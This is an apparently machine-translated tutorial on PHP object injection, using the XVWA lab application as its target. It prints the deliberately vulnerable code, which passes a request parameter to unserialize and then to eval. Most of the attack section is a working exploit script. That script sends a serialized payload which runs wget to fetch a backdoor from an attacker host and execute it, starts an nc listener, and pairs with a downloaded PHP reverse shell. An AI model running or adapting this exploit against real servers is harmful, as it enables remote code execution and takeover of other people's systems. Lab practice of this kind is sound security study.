This article is a short article about PHP serialization/object injection vulnerability analysis, which describes how to obtain the remote shell of the host.
If you want to test this vulnerability yourself, you can do so via XVWA and Kevgir.
The first step in exploiting the vulnerability is to test whether the target application has PHP serialization. To assist testing, we used Burpsuite's SuperSerial plug-in, the download address is here. It passively detects the presence of PHP and Java serialization.
Analysis
We detected the use of PHP serialization in the application, so we can start to confirm whether the application code contains a remote code execution vulnerability. It should be noted that the serialized object is taken from the parameter "r":
$var1=unserialize($_REQUEST['r']);
Then deserialize and eval:
eval($this ->inject);
Then, execute:
echo "
".$var1[0]." - ".$var1[1];
With these, if we bypass the parameters r's PHP serialized object, then you can get a code execution vulnerability!
< ?php error_reporting(E_ALL); class PHPObjectInjection{ public $inject; function __construct(){ } function __wakeup(){ if(isset($this->inject)){ eval($this->inject); } } } //?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"XtremeVulnerable Web Application";} if(isset($_REQUEST['r'])){ $var1=unserialize($_REQUEST['r']); if(is_array($var1)){ echo " ".$var1[0]." - ".$var1[1]; } }else{ echo "parameter is missing"; } ? >
Exploit
To exploit this vulnerability, we created a simple PHP script to automatically generate the PHP serialization payload and run the desired command on the target remote host. Then, I created a general PHP rebound shell, the download address is as follows:
http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
Note: You need to transfer this file to the web server, change the local IP and port in the rebound shell script, and the following exploit code:
<?php /* PHP Object Injection PoC Exploit by 1N3@CrowdShield - https://crowdshield.com A simple PoC to exploit PHP ObjectInjections flaws and gain remote shell access. Shouts to @jstnkndy @yappare for theassist! NOTE: This requireshttp://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gzsetup on a remote host with a connect back IP configured */ print"==============================================================================\r\n"; print "PHP Object Injection PoCExploit by 1N3 @CrowdShield - https://crowdshield.com\r\n"; print"==============================================================================\r\n"; print "[+] Generating serializedpayload...[OK]\r\n"; print "[+] Launching reverselistener...[OK]\r\n"; system('gnome-terminal -x sh -c \'nc -lvvp1234\''); class PHPObjectInjection { //CHANGE URL/FILENAME TO MATCH YOUR SETUP public $inject = "system('wget http://yourhost/phpobjbackdoor.txt-O phpobjbackdoor.php && php phpobjbackdoor.php');"; } $url ='http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TOTARGET URL/PARAMETER $url = $url . urlencode(serialize(newPHPObjectInjection)); print "[+] Sendingexploit...[OK]\r\n"; print "[+] Dropping down tointeractive shell...[OK]\r\n"; print"==============================================================================\r\n"; $response =file_get_contents("$url"); ? >
Demo
Now that our exploit script is ready, we can execute it to get the remote The rebound shell on the host is used to execute commands remotely!
The above is the entire content of this article. I hope it will be helpful to everyone in learning PHP programming.
The above has introduced PHP serialization/object injection vulnerability analysis, including PHP and object aspects. I hope it will be helpful to friends who are interested in PHP tutorials.